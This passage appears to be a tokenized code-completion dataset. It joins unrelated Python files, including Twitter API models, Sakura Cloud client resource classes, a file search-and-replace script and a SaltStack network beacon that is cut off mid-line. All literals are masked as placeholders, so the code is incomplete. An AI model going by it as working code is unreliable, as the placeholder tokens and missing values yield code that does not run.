. slug ) <EOL> def unsubscribe ( self ) : <EOL> return self . _api . unsubscribe_list ( self . user . screen_name , self . slug ) <EOL> def subscribers ( self , ** kargs ) : <EOL> return self . _api . list_subscribers ( self . user . screen_name , self . slug , ** kargs ) <EOL> def is_subscribed ( self , id ) : <EOL> return self . _api . is_subscribed_list ( self . user . screen_name , self . slug , id ) <EOL> class Relation ( Model ) : <EOL> @ classmethod <EOL> def parse ( cls , api , json ) : <EOL> result = cls ( api ) <EOL> for k , v in json . items ( ) : <EOL> if k == '<STR_LIT:value>' and json [ '<STR_LIT>' ] in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> setattr ( result , k , Status . parse ( api , v ) ) <EOL> elif k == '<STR_LIT>' : <EOL> setattr ( result , k , Relation . parse_list ( api , v ) ) <EOL> else : <EOL> setattr ( result , k , v ) <EOL> return result <EOL> class Relationship ( Model ) : <EOL> @ classmethod <EOL> def parse ( cls , api , json ) : <EOL> result = cls ( api ) <EOL> for k , v in json . items ( ) : <EOL> if k == '<STR_LIT>' : <EOL> setattr ( result , '<STR_LIT>' , '<STR_LIT>' in v ) <EOL> setattr ( result , '<STR_LIT>' , '<STR_LIT>' in v ) <EOL> else : <EOL> setattr ( result , k , v ) <EOL> return result <EOL> class JSONModel ( Model ) : <EOL> @ classmethod <EOL> def parse ( cls , api , json ) : <EOL> return json <EOL> class IDModel ( Model ) : <EOL> @ classmethod <EOL> def parse ( cls , api , json ) : <EOL> if isinstance ( json , list ) : <EOL> return json <EOL> else : <EOL> return json [ '<STR_LIT>' ] <EOL> class BoundingBox ( Model ) : <EOL> @ classmethod <EOL> def parse ( cls , api , json ) : <EOL> result = cls ( api ) <EOL> if json is not None : <EOL> for k , v in json . items ( ) : <EOL> setattr ( result , k , v ) <EOL> return result <EOL> def origin ( self ) : <EOL> """<STR_LIT>""" <EOL> return tuple ( self . coordinates [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) <EOL> def corner ( self ) : <EOL> """<STR_LIT>""" <EOL> return tuple ( self . coordinates [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] ) <EOL> class Place ( Model ) : <EOL> @ classmethod <EOL> def parse ( cls , api , json ) : <EOL> place = cls ( api ) <EOL> for k , v in json . items ( ) : <EOL> if k == '<STR_LIT>' : <EOL> if v is not None : <EOL> t = BoundingBox . parse ( api , v ) <EOL> else : <EOL> t = v <EOL> setattr ( place , k , t ) <EOL> elif k == '<STR_LIT>' : <EOL> setattr ( place , k , Place . parse_list ( api , v ) ) <EOL> else : <EOL> setattr ( place , k , v ) <EOL> return place <EOL> @ classmethod <EOL> def parse_list ( cls , api , json_list ) : <EOL> if isinstance ( json_list , list ) : <EOL> item_list = json_list <EOL> else : <EOL> item_list = json_list [ '<STR_LIT:result>' ] [ '<STR_LIT>' ] <EOL> results = ResultSet ( ) <EOL> for obj in item_list : <EOL> results . append ( cls . parse ( api , obj ) ) <EOL> return results <EOL> class ModelFactory ( object ) : <EOL> """<STR_LIT>""" <EOL> status = Status <EOL> user = User <EOL> direct_message = DirectMessage <EOL> friendship = Friendship <EOL> saved_search = SavedSearch <EOL> search_results = SearchResults <EOL> category = Category <EOL> list = List <EOL> relation = Relation <EOL> relationship = Relationship <EOL> json = JSONModel <EOL> ids = IDModel <EOL> place = Place <EOL> bounding_box = BoundingBox </s>
<s> import six <EOL> from ... errors . httpexception import HttpException <EOL> from ... errors . saklientexception import SaklientException <EOL> from . . client import Client <EOL> from . resource import Resource <EOL> from . icon import Icon <EOL> from . iface import Iface <EOL> from . swytch import Swytch <EOL> from . . enums . eapplianceclass import EApplianceClass <EOL> from . . enums . eavailability import EAvailability <EOL> from . . enums . eserverinstancestatus import EServerInstanceStatus <EOL> from ... util import Util <EOL> import saklient <EOL> str = six . text_type <EOL> class Appliance ( Resource ) : <EOL> def _api_path ( self ) : <EOL> return "<STR_LIT>" <EOL> def _root_key ( self ) : <EOL> return "<STR_LIT>" <EOL> def _root_key_m ( self ) : <EOL> return "<STR_LIT>" <EOL> def _class_name ( self ) : <EOL> return "<STR_LIT>" <EOL> def _id ( self ) : <EOL> return self . get_id ( ) <EOL> def save ( self ) : <EOL> return self . _save ( ) <EOL> def reload ( self ) : <EOL> return self . _reload ( ) <EOL> def __init__ ( self , client , obj , wrapped = False ) : <EOL> super ( Appliance , self ) . __init__ ( client ) <EOL> Util . validate_type ( client , "<STR_LIT>" ) <EOL> Util . validate_type ( wrapped , "<STR_LIT:bool>" ) <EOL> self . api_deserialize ( obj , wrapped ) <EOL> def _on_before_save ( self , query ) : <EOL> Util . set_by_path ( query , "<STR_LIT>" , self . get_raw_settings_hash ( ) ) <EOL> def get_swytch ( self ) : <EOL> model = Util . create_class_instance ( "<STR_LIT>" , [ self . _client ] ) <EOL> id = self . get_swytch_id ( ) <EOL> return model . get_by_id ( id ) <EOL> def apply ( self ) : <EOL> self . _client . request ( "<STR_LIT>" , self . _api_path ( ) + "<STR_LIT:/>" + Util . url_encode ( self . _id ( ) ) + "<STR_LIT>" ) <EOL> return self <EOL> def boot ( self ) : <EOL> self . _client . request ( "<STR_LIT>" , self . _api_path ( ) + "<STR_LIT:/>" + Util . url_encode ( self . _id ( ) ) + "<STR_LIT>" ) <EOL> return self <EOL> def shutdown ( self ) : <EOL> self . _client . request ( "<STR_LIT>" , self . _api_path ( ) + "<STR_LIT:/>" + Util . url_encode ( self . _id ( ) ) + "<STR_LIT>" ) <EOL> return self <EOL> def stop ( self ) : <EOL> self . _client . request ( "<STR_LIT>" , self . _api_path ( ) + "<STR_LIT:/>" + Util . url_encode ( self . _id ( ) ) + "<STR_LIT>" , { <EOL> '<STR_LIT>' : True <EOL> } ) <EOL> return self <EOL> def reboot ( self ) : <EOL> self . _client . request ( "<STR_LIT>" , self . _api_path ( ) + "<STR_LIT:/>" + Util . url_encode ( self . _id ( ) ) + "<STR_LIT>" ) <EOL> return self <EOL> def sleep_while_creating ( self , timeoutSec = <NUM_LIT> ) : <EOL> Util . validate_type ( timeoutSec , "<STR_LIT:int>" ) <EOL> step = <NUM_LIT:10> <EOL> while ( <NUM_LIT:0> < timeoutSec ) : <EOL> try : <EOL> self . reload ( ) <EOL> except saklient . errors . httpexception . HttpException : <EOL> pass <EOL> a = self . get_availability ( ) <EOL> if a == EAvailability . available : <EOL> return True <EOL> if a != EAvailability . migrating : <EOL> timeoutSec = <NUM_LIT:0> <EOL> timeoutSec -= step <EOL> if <NUM_LIT:0> < timeoutSec : <EOL> Util . sleep ( step ) <EOL> return False <EOL> def sleep_until_up ( self , timeoutSec = <NUM_LIT> ) : <EOL> Util . validate_type ( timeoutSec , "<STR_LIT:int>" ) <EOL> return self . sleep_until ( EServerInstanceStatus . up , timeoutSec ) <EOL> def sleep_until_down ( self , timeoutSec = <NUM_LIT> ) : <EOL> Util . validate_type ( timeoutSec , "<STR_LIT:int>" ) <EOL> return self . sleep_until ( EServerInstanceStatus . down , timeoutSec ) <EOL> def sleep_until ( self , status , timeoutSec = <NUM_LIT> ) : <EOL> Util . validate_type ( status , "<STR_LIT:str>" ) <EOL> Util . validate_type ( timeoutSec , "<STR_LIT:int>" ) <EOL> step = <NUM_LIT:10> <EOL> while ( <NUM_LIT:0> < timeoutSec ) : <EOL> try : <EOL> self . reload ( ) <EOL> except saklient . errors . httpexception . HttpException : <EOL> pass <EOL> s = self . get_status ( ) <EOL> if s is None : <EOL> s = EServerInstanceStatus . down <EOL> if s == status : <EOL> return True <EOL> timeoutSec -= step <EOL> if <NUM_LIT:0> < timeoutSec : <EOL> Util . sleep ( step ) <EOL> return False <EOL> def get_id ( self ) : <EOL> return self . m_id <EOL> id = property ( get_id , None , None ) <EOL> def get_clazz ( self ) : <EOL> return self . m_clazz <EOL> def set_clazz ( self , v ) : <EOL> Util . validate_type ( v , "<STR_LIT:str>" ) <EOL> if not self . is_new : <EOL> raise SaklientException ( "<STR_LIT>" , "<STR_LIT>" + "<STR_LIT>" ) <EOL> self . m_clazz = v <EOL> self . n_clazz = True <EOL> return self . m_clazz <EOL> clazz = property ( get_clazz , set_clazz , None ) <EOL> def get_name ( self ) : <EOL> return self . m_name <EOL> def set_name ( self , v ) : <EOL> Util . validate_type ( v , "<STR_LIT:str>" ) <EOL> self . m_name = v <EOL> self . n_name = True <EOL> return self . m_name <EOL> name = property ( get_name , set_name , None ) <EOL> def get_description ( self ) : <EOL> return self . m_description <EOL> def set_description ( self , v ) : <EOL> Util . validate_type ( v , "<STR_LIT:str>" ) <EOL> self . m_description = v <EOL> self . n_description = True <EOL> return self . m_description <EOL> description = property ( get_description , set_description , None ) <EOL> def get_tags ( self ) : <EOL> self . n_tags = True <EOL> return self . m_tags <EOL> def set_tags ( self , v ) : <EOL> Util . validate_type ( v , "<STR_LIT:list>" ) <EOL> self . m_tags = v <EOL> self . n_tags = True <EOL> return self . m_tags <EOL> tags = property ( get_tags , set_tags , None ) <EOL> def get_icon ( self ) : <EOL> return self . m_icon <EOL> def set_icon ( self , v ) : <EOL> Util . validate_type ( v , "<STR_LIT>" ) <EOL> self . m_icon = v <EOL> self . n_icon = True <EOL> return self . m_icon <EOL> icon = property ( get_icon , set_icon , None ) <EOL> def get_plan_id ( self ) : <EOL> return self . m_plan_id <EOL> def set_plan_id ( self , v ) : <EOL> Util . validate_type ( v , "<STR_LIT:int>" ) <EOL> if not self . is_new : <EOL> raise SaklientException ( "<STR_LIT>" , "<STR_LIT>" + "<STR_LIT>" ) <EOL> self . m_plan_id = v <EOL> self . n_plan_id = True <EOL> return self . m_plan_id <EOL> plan_id = property ( get_plan_id , set_plan_id , None ) <EOL> def get_ifaces ( self ) : <EOL> return self . m_ifaces <EOL> ifaces = property ( get_ifaces , None , None ) <EOL> def get_raw_annotation ( self ) : <EOL> return self . m_raw_annotation <EOL> def set_raw_annotation ( self , v ) : <EOL> if not self . is_new : <EOL> raise SaklientException ( "<STR_LIT>" , "<STR_LIT>" + "<STR_LIT>" ) <EOL> self . m_raw_annotation = v <EOL> self . n_raw_annotation = True <EOL> return self . m_raw_annotation <EOL> raw_annotation = property ( get_raw_annotation , set_raw_annotation , None ) <EOL> def get_raw_settings ( self ) : <EOL> self . n_raw_settings = True <EOL> return self . m_raw_settings <EOL> def set_raw_settings ( self , v ) : <EOL> self . m_raw_settings = v <EOL> self . n_raw_settings = True <EOL> return self . m_raw_settings <EOL> raw_settings = property ( get_raw_settings , set_raw_settings , None ) <EOL> def get_raw_settings_hash ( self ) : <EOL> return self . m_raw_settings_hash <EOL> raw_settings_hash = property ( get_raw_settings_hash , None , None ) <EOL> def get_status ( self ) : <EOL> return self . m_status <EOL> status = property ( get_status , None , None ) <EOL> def get_service_class ( self ) : <EOL> return self . m_service_class <EOL> service_class = property ( get_service_class , None , None ) <EOL> def get_availability ( self ) : <EOL> return self . m_availability <EOL> availability = property ( get_availability , None , None ) <EOL> def get_swytch_id ( self ) : <EOL> return self . m_swytch_id <EOL> swytch_id = property ( get_swytch_id , None , None ) <EOL> def api_deserialize_impl ( self , r ) : <EOL> self . is_new = r is None <EOL> if self . is_new : <EOL> r = { <EOL> } <EOL> self . is_incomplete = False <EOL> if Util . exists_path ( r , "<STR_LIT>" ) : <EOL> self . m_id = None if Util . get_by_path ( r , "<STR_LIT>" ) is None else str ( Util . get_by_path ( r , "<STR_LIT>" ) ) <EOL> else : <EOL> self . m_id = None <EOL> self . is_incomplete = True <EOL> self . n_id = False <EOL> if Util . exists_path ( r , "<STR_LIT>" ) : <EOL> self . m_clazz = None if Util . get_by_path ( r , "<STR_LIT>" ) is None else str ( Util . get_by_path ( r , "<STR_LIT>" ) ) <EOL> else : <EOL> self . m_clazz = None <EOL> self . is_incomplete = True <EOL> self . n_clazz = False <EOL> if Util . exists_path ( r , "<STR_LIT:Name>" ) : <EOL> self . m_name = None if Util . get_by_path ( r , "<STR_LIT:Name>" ) is None else str ( Util . get_by_path ( r , "<STR_LIT:Name>" ) ) <EOL> else : <EOL> self . m_name = None <EOL> self . is_incomplete = True <EOL> self . n_name = False <EOL> if Util . exists_path ( r , "<STR_LIT>" ) : <EOL> self . m_description = None if Util . get_by_path ( r , "<STR_LIT>" ) is None else str ( Util . get_by_path ( r , "<STR_LIT>" ) ) <EOL> else : <EOL> self . m_description = None <EOL> self . is_incomplete = True <EOL> self . n_description = False <EOL> if Util . exists_path ( r , "<STR_LIT>" ) : <EOL> if Util . get_by_path ( r , "<STR_LIT>" ) is None : <EOL> self . m_tags = [ ] <EOL> else : <EOL> self . m_tags = [ ] <EOL> for t in Util . get_by_path ( r , "<STR_LIT>" ) : <EOL> v1 = None <EOL> v1 = None if t is None else str ( t ) <EOL> self . m_tags . append ( v1 ) <EOL> else : <EOL> self . m_tags = None <EOL> self . is_incomplete = True <EOL> self . n_tags = False <EOL> if Util . exists_path ( r , "<STR_LIT>" ) : <EOL> self . m_icon = None if Util . get_by_path ( r , "<STR_LIT>" ) is None else Icon ( self . _client , Util . get_by_path ( r , "<STR_LIT>" ) ) <EOL> else : <EOL> self . m_icon = None <EOL> self . is_incomplete = True <EOL> self . n_icon = False <EOL> if Util . exists_path ( r , "<STR_LIT>" ) : <EOL> self . m_plan_id = None if Util . get_by_path ( r , "<STR_LIT>" ) is None else int ( str ( Util . get_by_path ( r , "<STR_LIT>" ) ) ) <EOL> else : <EOL> self . m_plan_id = None <EOL> self . is_incomplete = True <EOL> self . n_plan_id = False <EOL> if Util . exists_path ( r , "<STR_LIT>" ) : <EOL> if Util . get_by_path ( r , "<STR_LIT>" ) is None : <EOL> self . m_ifaces = [ ] <EOL> else : <EOL> self . m_ifaces = [ ] <EOL> for t in Util . get_by_path ( r , "<STR_LIT>" ) : <EOL> v2 = None <EOL> v2 = None if t is None else Iface ( self . _client , t ) <EOL> self . m_ifaces . append ( v2 ) <EOL> else : <EOL> self . m_ifaces = None <EOL> self . is_incomplete = True <EOL> self . n_ifaces = False <EOL> if Util . exists_path ( r , "<STR_LIT>" ) : <EOL> self . m_raw_annotation = Util . get_by_path ( r , "<STR_LIT>" ) <EOL> else : <EOL> self . m_raw_annotation = None <EOL> self . is_incomplete = True <EOL> self . n_raw_annotation = False <EOL> if Util . exists_path ( r , "<STR_LIT>" ) : <EOL> self . m_raw_settings = Util . get_by_path ( r , "<STR_LIT>" ) <EOL> else : <EOL> self . m_raw_settings = None <EOL> self . is_incomplete = True <EOL> self . n_raw_settings = False <EOL> if Util . exists_path ( r , "<STR_LIT>" ) : <EOL> self . m_raw_settings_hash = None if Util . get_by_path ( r , "<STR_LIT>" ) is None else str ( Util . get_by_path ( r , "<STR_LIT>" ) ) <EOL> else : <EOL> self . m_raw_settings_hash = None <EOL> self . is_incomplete = True <EOL> self . n_raw_settings_hash = False <EOL> if Util . exists_path ( r , "<STR_LIT>" ) : <EOL> self . m_status = None if Util . get_by_path ( r , "<STR_LIT>" ) is None else str ( Util . get_by_path ( r , "<STR_LIT>" ) ) <EOL> else : <EOL> self . m_status = None <EOL> self . is_incomplete = True <EOL> self . n_status = False <EOL> if Util . exists_path ( r , "<STR_LIT>" ) : <EOL> self . m_service_class = None if Util . get_by_path ( r , "<STR_LIT>" ) is None else str ( Util . get_by_path ( r , "<STR_LIT>" ) ) <EOL> else : <EOL> self . m_service_class = None <EOL> self . is_incomplete = True <EOL> self . n_service_class = False <EOL> if Util . exists_path ( r , "<STR_LIT>" ) : <EOL> self . m_availability = None if Util . get_by_path ( r , "<STR_LIT>" ) is None else str ( Util . get_by_path ( r , "<STR_LIT>" ) ) <EOL> else : <EOL> self . m_availability = None <EOL> self . is_incomplete = True <EOL> self . n_availability = False <EOL> if Util . exists_path ( r , "<STR_LIT>" ) : <EOL> self . m_swytch_id = None if Util . get_by_path ( r , "<STR_LIT>" ) is None else str ( Util . get_by_path ( r , "<STR_LIT>" ) ) <EOL> else : <EOL> self . m_swytch_id = None <EOL> self . is_incomplete = True <EOL> self . n_swytch_id = False <EOL> def api_serialize_impl ( self , withClean = False ) : <EOL> Util . validate_type ( withClean , "<STR_LIT:bool>" ) <EOL> missing = [ ] <EOL> ret = { <EOL> } <EOL> if withClean or self . n_id : <EOL> Util . set_by_path ( ret , "<STR_LIT>" , self . m_id ) <EOL> if withClean or self . n_clazz : <EOL> Util . set_by_path ( ret , "<STR_LIT>" , self . m_clazz ) <EOL> else : <EOL> if self . is_new : <EOL> missing . append ( "<STR_LIT>" ) <EOL> if withClean or self . n_name : <EOL> Util . set_by_path ( ret , "<STR_LIT:Name>" , self . m_name ) <EOL> else : <EOL> if self . is_new : <EOL> missing . append ( "<STR_LIT:name>" ) <EOL> if withClean or self . n_description : <EOL> Util . set_by_path ( ret , "<STR_LIT>" , self . m_description ) <EOL> if withClean or self . n_tags : <EOL> Util . set_by_path ( ret , "<STR_LIT>" , [ ] ) <EOL> for r1 in self . m_tags : <EOL> v = None <EOL> v = r1 <EOL> ( ret [ "<STR_LIT>" ] if "<STR_LIT>" in ret else None ) . append ( v ) <EOL> if withClean or self . n_icon : <EOL> Util . set_by_path ( ret , "<STR_LIT>" , ( None if self . m_icon is None else self . m_icon . api_serialize ( withClean ) ) if withClean else ( { <EOL> '<STR_LIT>' : "<STR_LIT:0>" <EOL> } if self . m_icon is None else self . m_icon . api_serialize_id ( ) ) ) <EOL> if withClean or self . n_plan_id : <EOL> Util . set_by_path ( ret , "<STR_LIT>" , self . m_plan_id ) <EOL> else : <EOL> if self . is_new : <EOL> missing . append ( "<STR_LIT>" ) <EOL> if withClean or self . n_ifaces : <EOL> Util . set_by_path ( ret , "<STR_LIT>" , [ ] ) <EOL> for r2 in self . m_ifaces : <EOL> v = None <EOL> v = ( None if r2 is None else r2 . api_serialize ( withClean ) ) if withClean else ( { <EOL> '<STR_LIT>' : "<STR_LIT:0>" <EOL> } if r2 is None else r2 . api_serialize_id ( ) ) <EOL> ( ret [ "<STR_LIT>" ] if "<STR_LIT>" in ret else None ) . append ( v ) <EOL> if withClean or self . n_raw_annotation : <EOL> Util . set_by_path ( ret , "<STR_LIT>" , self . m_raw_annotation ) <EOL> else : <EOL> if self . is_new : <EOL> missing . append ( "<STR_LIT>" ) <EOL> if withClean or self . n_raw_settings : <EOL> Util . set_by_path ( ret , "<STR_LIT>" , self . m_raw_settings ) <EOL> if withClean or self . n_raw_settings_hash : <EOL> Util . set_by_path ( ret , "<STR_LIT>" , self . m_raw_settings_hash ) <EOL> if withClean or self . n_status : <EOL> Util . set_by_path ( ret , "<STR_LIT>" , self . m_status ) <EOL> if withClean or self . n_service_class : <EOL> Util . set_by_path ( ret , "<STR_LIT>" , self . m_service_class ) <EOL> if withClean or self . n_availability : <EOL> Util . set_by_path ( ret , "<STR_LIT>" , self . m_availability ) <EOL> if withClean or self . n_swytch_id : <EOL> Util . set_by_path ( ret , "<STR_LIT>" , self . m_swytch_id ) <EOL> if len ( missing ) > <NUM_LIT:0> : <EOL> raise SaklientException ( "<STR_LIT>" , "<STR_LIT>" + "<STR_LIT:U+002CU+0020>" . join ( missing ) ) <EOL> return ret </s>
<s> import six <EOL> from ... util import Util <EOL> from . . client import Client <EOL> from ... errors . httpexception import HttpException <EOL> import re <EOL> import saklient <EOL> str = six . text_type <EOL> class Resource ( object ) : <EOL> def get_client ( self ) : <EOL> return self . _client <EOL> client = property ( get_client , None , None ) <EOL> def set_param ( self , key , value ) : <EOL> Util . validate_type ( key , "<STR_LIT:str>" ) <EOL> self . _query [ key ] = value <EOL> def _api_path ( self ) : <EOL> return None <EOL> def _root_key ( self ) : <EOL> return None <EOL> def _root_key_m ( self ) : <EOL> return None <EOL> def _class_name ( self ) : <EOL> return None <EOL> def _id ( self ) : <EOL> return None <EOL> def __init__ ( self , client ) : <EOL> Util . validate_type ( client , "<STR_LIT>" ) <EOL> self . _client = client <EOL> self . _query = { } <EOL> def _on_before_save ( self , query ) : <EOL> { } <EOL> def _on_before_api_deserialize ( self , r , root ) : <EOL> { } <EOL> def _on_after_api_deserialize ( self , r , root ) : <EOL> { } <EOL> def _on_before_api_serialize ( self , withClean ) : <EOL> Util . validate_type ( withClean , "<STR_LIT:bool>" ) <EOL> def _on_after_api_serialize ( self , r , withClean ) : <EOL> Util . validate_type ( withClean , "<STR_LIT:bool>" ) <EOL> def api_deserialize_impl ( self , r ) : <EOL> { } <EOL> def api_deserialize ( self , obj , wrapped = False ) : <EOL> Util . validate_type ( wrapped , "<STR_LIT:bool>" ) <EOL> root = None <EOL> record = None <EOL> rkey = self . _root_key ( ) <EOL> if obj is not None : <EOL> if not wrapped : <EOL> if rkey is not None : <EOL> root = { } <EOL> root [ rkey ] = obj <EOL> record = obj <EOL> else : <EOL> root = obj <EOL> record = ( obj [ rkey ] if rkey in obj else None ) <EOL> self . _on_before_api_deserialize ( record , root ) <EOL> self . api_deserialize_impl ( record ) <EOL> self . _on_after_api_deserialize ( record , root ) <EOL> def api_serialize_impl ( self , withClean = False ) : <EOL> Util . validate_type ( withClean , "<STR_LIT:bool>" ) <EOL> return None <EOL> def api_serialize ( self , withClean = False ) : <EOL> Util . validate_type ( withClean , "<STR_LIT:bool>" ) <EOL> self . _on_before_api_serialize ( withClean ) <EOL> ret = self . api_serialize_impl ( withClean ) <EOL> self . _on_after_api_serialize ( ret , withClean ) <EOL> return ret <EOL> def api_serialize_id ( self ) : <EOL> id = self . _id ( ) <EOL> if id is None : <EOL> return None <EOL> r = { } <EOL> r [ "<STR_LIT>" ] = id <EOL> return r <EOL> def normalize_field_name ( self , name ) : <EOL> Util . validate_type ( name , "<STR_LIT:str>" ) <EOL> name = re . sub ( '<STR_LIT>' , lambda m : '<STR_LIT:_>' + m . group ( <NUM_LIT:0> ) . lower ( ) , name ) <EOL> return name <EOL> def _save ( self ) : <EOL> r = self . api_serialize ( ) <EOL> query = self . _query <EOL> self . _query = { } <EOL> keys = query . keys ( ) <EOL> for k in keys : <EOL> v = ( query [ k ] if k in query else None ) <EOL> r [ k ] = v <EOL> method = "<STR_LIT:POST>" if self . is_new else "<STR_LIT>" <EOL> path = self . _api_path ( ) <EOL> if not self . is_new : <EOL> path += "<STR_LIT:/>" + Util . url_encode ( self . _id ( ) ) <EOL> q = { } <EOL> q [ self . _root_key ( ) ] = r <EOL> self . _on_before_save ( q ) <EOL> result = self . _client . request ( method , path , q ) <EOL> self . api_deserialize ( result , True ) <EOL> return self <EOL> def destroy ( self ) : <EOL> if self . is_new : <EOL> return <EOL> path = self . _api_path ( ) + "<STR_LIT:/>" + Util . url_encode ( self . _id ( ) ) <EOL> self . request_retry ( "<STR_LIT>" , path ) <EOL> def _reload ( self ) : <EOL> id = self . _id ( ) <EOL> if id is not None : <EOL> result = self . request_retry ( "<STR_LIT:GET>" , self . _api_path ( ) + "<STR_LIT:/>" + Util . url_encode ( id ) ) <EOL> self . api_deserialize ( result , True ) <EOL> return self <EOL> def exists ( self ) : <EOL> query = { } <EOL> Util . set_by_path ( query , "<STR_LIT>" , [ self . _id ( ) ] ) <EOL> Util . set_by_path ( query , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> result = self . request_retry ( "<STR_LIT:GET>" , self . _api_path ( ) , query ) <EOL> cnt = ( result [ "<STR_LIT>" ] if "<STR_LIT>" in result else None ) <EOL> return cnt == <NUM_LIT:1> <EOL> def dump ( self ) : <EOL> return self . api_serialize ( True ) <EOL> @ staticmethod <EOL> def create_with ( className , client , obj , wrapped = False ) : <EOL> Util . validate_type ( className , "<STR_LIT:str>" ) <EOL> Util . validate_type ( client , "<STR_LIT>" ) <EOL> Util . validate_type ( wrapped , "<STR_LIT:bool>" ) <EOL> a = [ client , obj , wrapped ] <EOL> return Util . create_class_instance ( "<STR_LIT>" + className , a ) <EOL> def request_retry ( self , method , path , query = None , retryCount = <NUM_LIT:5> , retrySleep = <NUM_LIT:5> ) : <EOL> Util . validate_type ( method , "<STR_LIT:str>" ) <EOL> Util . validate_type ( path , "<STR_LIT:str>" ) <EOL> Util . validate_type ( retryCount , "<STR_LIT:int>" ) <EOL> Util . validate_type ( retrySleep , "<STR_LIT:int>" ) <EOL> ret = None <EOL> while ( <NUM_LIT:1> < retryCount ) : <EOL> isOk = False <EOL> try : <EOL> ret = self . _client . request ( method , path , query ) <EOL> isOk = True <EOL> except saklient . errors . httpexception . HttpException : <EOL> isOk = False <EOL> if isOk : <EOL> retryCount = - <NUM_LIT:1> <EOL> else : <EOL> retryCount -= <NUM_LIT:1> <EOL> Util . sleep ( retrySleep ) <EOL> if retryCount == <NUM_LIT:0> : <EOL> ret = self . _client . request ( method , path , query ) <EOL> return ret </s>
<s> from __future__ import print_function <EOL> import sys , getopt <EOL> def display_help ( ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> def main ( argv ) : <EOL> target = '<STR_LIT>' <EOL> search = '<STR_LIT>' <EOL> replace = '<STR_LIT:..>' <EOL> try : <EOL> opts , args = getopt . getopt ( argv , "<STR_LIT>" , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> except getopt . GetoptError : <EOL> display_help ( ) <EOL> for opt , arg in opts : <EOL> if opt == '<STR_LIT>' : <EOL> display_help ( ) <EOL> elif opt in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> target = arg <EOL> elif opt in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> search = arg <EOL> elif opt in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> replace = arg <EOL> if target == '<STR_LIT>' : <EOL> display_help ( ) <EOL> f = open ( target , '<STR_LIT:rb>' ) . read ( ) <EOL> f = f . replace ( search , replace ) <EOL> f = f . replace ( search . lower ( ) , replace ) <EOL> open ( target , '<STR_LIT:wb>' ) . write ( f ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( sys . argv [ <NUM_LIT:1> : ] ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> try : <EOL> from pyroute2 . ipdb import IPDB <EOL> HAS_PYROUTE2 = True <EOL> except ImportError : <EOL> HAS_PYROUTE2 = False <EOL> import ast <EOL> import re <EOL> import salt . loader <EOL> import logging <EOL> log = logging . getLogger ( __name__ ) <EOL> __virtual_name__ = '<STR_LIT>' <EOL> ATTRS = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:index>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:address>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> LAST_STATS = { } <EOL> IP = IPDB ( ) <EOL> class Hashabledict ( dict ) : <EOL> '''<STR_LIT>''' <EOL> def __hash__ ( self ) : <EOL> return hash ( tuple ( sorted ( self . items ( ) ) ) ) <EOL> def __virtual__ ( ) : <EOL> if HAS_PYROUTE2 : <EOL> return __virtual_name__ <EOL> return False <EOL> def validate ( config ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( config , dict ) : <EOL> return False , ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> for item in config : <EOL> if item == '<STR_LIT>' : <EOL> continue <EOL> if not isinstance ( config [ item ] , dict ) : <EOL> return False , ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> if not all ( j in ATTRS for j in config [ item ] ) : <EOL> return False , ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return True , '<STR_LIT>' <EOL> def _copy_interfaces_info ( interfaces ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> for interface in interfaces : <EOL> _interface_attrs_cpy = set ( ) <EOL> for attr in ATTRS : <EOL> attr_dict = Hashabledict ( ) <EOL> attr_dict [ attr ] = repr ( interfaces [ interface ] [ attr ] ) <EOL> _interface_attrs_cpy . add ( attr_dict ) <EOL> ret [ interface ] = _interface_attrs_cpy <EOL> return ret <EOL> def beacon ( config ) : <EOL> '''<STR_LIT>''' <EOL> ret = [ ] <EOL> interfaces = [ ] <EOL> expanded_config = { } <EOL> global LAST_STATS <EOL> coalesce = False <EOL> _stats = _copy_interfaces_info ( IP . by_name ) <EOL> if not LAST_STATS : <EOL> LAST_STATS = _stats <EOL> if '<STR_LIT>' in config and config [ '<STR_LIT>' ] : <EOL> coalesce = True <EOL> changes = { } <EOL> for item in config : <EOL> if item == '<STR_LIT>' : <EOL> continue <EOL> if item in _stats : <EOL> interfaces . append ( item ) <EOL> else : <EOL> interface_regexp = item . replace ( '<STR_LIT:*>' , '<STR_LIT>' ) <EOL> for interface in _stats : <EOL> match = re . search ( interface_regexp , interface ) <EOL> if match : <EOL> interfaces . append ( match . group ( ) ) <EOL> expanded_config [ match . group ( ) ] = config [ item ] <EOL> if expanded_config : <EOL> config . update ( expanded_config ) <EOL> for interface in interfaces : <EOL> _send_event = False <EOL> _diff_stats = _stats [ 